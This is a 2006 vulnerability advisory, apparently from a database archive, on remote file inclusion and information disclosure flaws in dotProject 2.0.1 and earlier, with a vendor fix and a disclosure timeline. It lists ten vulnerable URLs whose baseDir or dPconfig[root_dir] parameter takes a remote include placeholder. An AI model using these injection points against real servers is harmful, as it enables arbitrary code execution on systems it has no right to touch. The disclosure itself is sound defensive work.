dotproject <= 2.0.1 remote code execution

2006-02-15T00:00:00
ID SECURITYVULNS:DOC:11440
Type securityvulns
Reporter Securityvulns
Modified 2006-02-15T00:00:00

Description

dotproject <= 2.0.1 remote code execution

    Software: dotProject &lt;= 2.0.1
    Severity: Arbitrary code execution, Path/Information Disclosure
    Risk: High
    Author: Robin Verton &lt;r.verton@gmail.com&gt;
    Date: Feb. 14 2006
    Vendor: dotproject.net [contacted]

    Description:
     dotProject is a volunteer supported Project Management application.

    Details:
     The &#39;protection.php&#39; script does not properly validate user-supplied input in the &#39;siteurl&#39;

parameter. Some user-supplied input is not checked correctly so an attacker can include a remote php file and execute arbitrary phpcode or arbitrary system command via eval().

     Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
     To exploit these vulnerables register_globals have to be set ON &#40;default&#41;.

     1&#41; /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

     2&#41; /includes/db_connect.php?baseDir=[REMOTE INCLUDE]

     3&#41; /includes/session.php?baseDir=[REMOTE INCLUDE]

     4&#41; /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

     5&#41; /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

     6&#41; /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

     7&#41; /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

     8&#41; /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

     9&#41; /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

     10&#41; /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

     There are also some path discolsure bugs:

     Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
     baseDir=foobar.

     Then, if the /doc/ directory is not deleted &#40;default&#41; you can access to two varoius files which
     disclose you some system informations:

     1&#41; /docs/phpinfo.php - A phpinfo&#40;&#41; file.

     2&#41; /docs/check.php - Some more informations about the installed dotProject.

    Solution:
     Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.

    Timeline:
     24.01.2006 - Bugs found
     26.01.2006 - Vendor Contacted
     14.02.2006 - Publishing

    Credits:
     Credits go to Robin Verton &#40;r.verton [at] gmail [dot] com&#41;